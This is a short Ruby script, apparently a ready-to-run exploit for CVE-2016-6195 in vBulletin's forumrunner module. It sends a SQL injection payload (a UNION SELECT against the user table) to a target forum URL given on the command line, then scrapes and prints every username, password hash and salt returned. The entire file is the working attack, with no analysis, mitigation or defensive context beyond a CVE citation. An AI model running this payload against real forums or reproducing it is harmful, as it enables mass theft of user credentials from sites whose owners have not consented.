#!/usr/bin/env ruby
$LOAD_PATH << 'lib'

##################################################
#            Based on CVE-2016-6195              #
#    https://www.exploit-db.com/exploits/40751   #
##################################################


require 'mechanize'

def exploit(url)
  m = Mechanize.new
  ex = "#{url}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -"

  res = m.get(ex).search('body').css(".restore").to_s
  users = res.split("<br>")
  puts users
end

if ARGV.empty?
  puts "Usage: vbdump.rb http://example.com/forums"
else
  exploit(ARGV[0])
end
